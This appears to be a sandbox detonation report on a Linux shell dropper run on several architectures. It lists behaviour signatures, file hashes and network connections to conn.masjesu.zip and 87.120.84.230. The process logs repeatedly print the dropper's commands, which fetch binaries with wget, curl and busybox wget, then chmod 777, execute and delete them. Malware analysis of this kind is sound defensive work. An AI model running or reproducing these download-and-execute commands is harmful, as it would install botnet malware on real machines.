/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 7689ca8c5bc85cf6b78ef89323d4df6a |
| SHA1 | a1392ec3b571b3de167f0b9a5dadab4f14a2db76 |
| SHA256 | 17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5 |
| SHA512 | 40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471 |
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
| MD5 | e1732e70f015e99d14dff1eeeaec9966 |
| SHA1 | c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113 |
| SHA256 | 6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e |
| SHA512 | 6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-29 01:06
Reported
2024-10-29 01:09
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh
[/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| GB | 195.181.164.15:443 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 01:06
Reported
2024-10-29 01:09
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh
[/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 01:06
Reported
2024-10-29 01:09
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
32s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
Processes
/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh
[/tmp/99985a1d9b11bcf965a5a730b18bad194bf5c5c357a5f2c2e2e8f554bb5df4db.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
